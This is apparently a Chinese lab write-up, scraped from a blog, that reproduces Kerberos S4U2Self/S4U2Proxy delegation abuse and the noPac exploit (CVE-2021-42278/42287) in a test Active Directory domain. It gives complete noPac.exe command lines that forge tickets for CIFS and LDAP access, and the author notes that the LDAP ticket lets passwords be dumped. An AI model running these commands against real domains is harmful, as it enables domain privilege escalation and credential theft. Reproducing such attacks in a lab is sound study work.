当前位置: 首页 > news >正文

#S4U2SELF#S4U2Proxy#CVE-2021-42278/42287以及手动复现

目录

#S4U2SELF

Win08手动赋予委托服务属性

Win10身份验证

AS请求 

TGS请求

#S4U2Proxy 

申请其他服务 

#CVE-2021-42278/42287 


#S4U2SELF

s4u2 

@xwj456

可以看到普通用户是没用委托属性的 

Win08手动赋予委托服务属性

setspn -A wsw/wsw.com s4u2 

Win10身份验证

s4u2

@xwj456

AS请求 

两个勾

两个勾和include-pac记得按上(蓝色) ,发包之前把wireshark打开,方便记录和排查

TGS请求

上面四个勾+下面两个勾

#S4U2Proxy 

申请其他服务 

Win08添加

添加cifs

组策略管理 

注意这里是用户s4u2

成功添加

请求之前打开wireshark

AS请求(同上)

第一次TGS请求(同上)

第二次TGS请求 

include-pac按掉,S4U2SELF不要勾 

最后生成的那个票据重命名proxy,复制到工具里

#CVE-2021-42278/42287 

noPac.exe
noPac.exe -domain test.com -user krbuser -pass @xwj123 /dc WIN-8RSOOTMELL5.test.com /mAccount demohb /mPassword @xwj123 /service cifs /ptt

(黄色部分每次都要改一改,创建不同的计算机账户)

cifs只能访问C盘 

noPac.exe -domain test.com -user krbuser -pass @xwj123 /dc WIN-8RSOOTMELL5.test.com /mAccount demohb3 /mPassword @xwj123 /service ldap /ptt 

 这个可以把密码荡下来

手动复现

 

域用户用域控发包

  

这里可以找到它的域控

http://www.xdnf.cn/news/429841.html

相关文章:

  • 脑机接口技术:开启人类与机器融合的新时代
  • 《从像素到身份:Flutter如何打通社交应用人脸识别的技术闭环》
  • 本地缓存的三种实现
  • 检索增强生成(RAG)简介
  • Codeforces Round 998 (Div. 3)
  • STM32F103_LL库+寄存器学习笔记22 - 基础定时器TIM实现1ms周期回调
  • 深入浅出:C++数据处理类与计算机网络的巧妙类比
  • Oracle OCP认证考试考点详解083系列15
  • CVE-2016-4977 漏洞深度分析
  • TensorFlow之微分求导
  • 力扣-101.对称二叉树
  • JIT+Opcache如何配置才能达到性能最优
  • Spring Boot 自动装配原理详解
  • openGauss与海量100数据库对比
  • vscode点击函数名/变量/文件名无法跳转
  • 项目图标组件处理
  • LabVIEW 程序运行时内存不足报错原因
  • STM32 __rt_entry
  • AD19基础应用技巧:Via 尺寸设置界面 (Size and Shape)
  • AI视频生成工具开发与搭建:从技术到应用的全方位指南
  • linux中fork()函数的小问题
  • solidwors插件库收集
  • 社区商业增值服务生态薄弱?停车反哺+商户联盟激活双向收益
  • 最大子段和(递推)
  • 2.4GHz无线通信芯片选型指南:集成SOC与低功耗方案解析
  • Python+1688 API 开发教程:实现商品实时数据采集的完整接入方案
  • 云蝠智能大模型呼叫接入通义千问qwen3模型!
  • 2025年RIS SCI2区,改进白鲸优化算法+复杂非线性方程组求解,深度解析+性能实测
  • 超标量处理器设计5-指令集体系
  • uniapp+vue3开发项目之引入vuex状态管理工具